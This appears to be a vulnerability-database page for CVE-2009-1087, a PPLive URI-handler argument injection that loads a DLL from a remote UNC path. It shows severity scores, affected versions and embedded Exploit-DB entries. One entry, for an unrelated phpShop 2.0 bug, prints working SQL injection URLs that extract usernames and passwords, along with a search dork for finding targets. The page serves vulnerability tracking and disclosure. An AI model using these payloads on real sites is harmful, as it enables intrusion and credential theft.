CVE-2009-1087
published 2009-03-25CVE-2009-1087: Multiple argument injection vulnerabilities in PPLive.exe in PPLive 1.9.21 and earlier allow remote attackers to execute arbitrary code via a UNC share…
PriorityP350critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.14%
91.3th percentile
Multiple argument injection vulnerabilities in PPLive.exe in PPLive 1.9.21 and earlier allow remote attackers to execute arbitrary code via a UNC share pathname in the LoadModule argument to the (1) synacast, (2) Play, (3) pplsv, or (4) ppvod URI handler. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pplive | pplive | <= 1.9.21 | — |
| pplive | pplive | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpShop 2.0 - SQL Injection
exploitdb·2013-01-14
CVE-2009-4571 phpShop 2.0 - SQL Injection
phpShop 2.0 - SQL Injection
---
# Exploit Title : phpshop 2.0 SQL Injection Vulnerability
# Author : By onestree
# Software Link : http://code.google.com/p/phpshop/downloads/list
# tested : windows 7 / ubuntu
# Dork : inurl:"tanyakan pada rumput yang bergoyang"
SQLi p0c:
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
Exploit-DB
PPLive 1.9.21 - '/LoadModule' URI Handlers Argument Injection
exploitdb·2009-03-16
CVE-2009-1087 PPLive 1.9.21 - '/LoadModule' URI Handlers Argument Injection
PPLive 1.9.21 - '/LoadModule' URI Handlers Argument Injection
---
PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection
by Nine:Situations:Group::strawdog
software site:http://www.pplive.com/en/index.html
our site: http://retrogod.altervista.org/
software description:
"PPLive is a peer-to-peer streaming video network created in Huazhong University
of Science and Technology, People's Republic of China. It is part of a new
generation of P2P applications, that combine P2P and Internet TV, called P2PTV."
vulnerability:
The "synacast://", "Play://" ,"pplsv://" and "ppvod://" URI handlers do not
verify certain parts of the URI before evaluating command line parameters.
This can be exploited against Internet Explorer to e.g. load a dll from a remote
UNC path via the "/LoadModu
No writeups or analysis indexed.
http://secunia.com/advisories/34327http://www.vupen.com/english/advisories/2009/0739https://exchange.xforce.ibmcloud.com/vulnerabilities/49263https://www.exploit-db.com/exploits/8215http://secunia.com/advisories/34327http://www.vupen.com/english/advisories/2009/0739https://exchange.xforce.ibmcloud.com/vulnerabilities/49263https://www.exploit-db.com/exploits/8215
2009-03-25
Published